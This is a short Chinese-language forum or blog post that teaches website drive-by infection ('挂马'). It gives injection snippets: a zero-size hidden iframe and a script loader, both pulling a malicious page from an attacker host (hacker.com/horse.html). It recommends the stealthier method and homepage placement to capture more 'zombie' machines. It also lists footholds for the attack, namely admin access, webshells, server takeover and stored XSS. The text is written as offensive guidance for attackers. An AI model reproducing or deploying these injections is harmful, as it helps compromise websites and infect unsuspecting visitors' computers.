我觉得网页挂马要考虑两个因素:隐蔽性、成功率。
我们只需保证浏览器加载并执行我们构造的特殊网页即可,这样的方法有许多。
方法一,我们可以在首页加入以下这行代码。
<iframe src="http://www.hacker.com/horse.html" width=0 height=0></iframe>
方法二,我们可以在首页加入以下这行代码。
<script str="http://www.test.com/horse.js"></script>
horse.js可以这样写:
new Image.src="http://www.hacker.com/horse.html";
或者
document.write("<iframe src='http://www.hacker.com/horse.html' width=0 height=0></iframe>");
考虑到隐蔽性建议采用第二种方法。挂在首页是因为首页的访问量是最大的,这样可以收获更多的肉鸡。当然,如果你的目标仅是网站管理员,那么你可以考虑挂在后台主页,当然还可以加其它条件以提高定点挂马的精准度。
什么情况下可以进行网页挂马,这个就看你思路够不够猥琐了。比如:1.有后台管理权限;2.拿下了webshell;3.拿下了服务器;4.存储型 XSS;
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
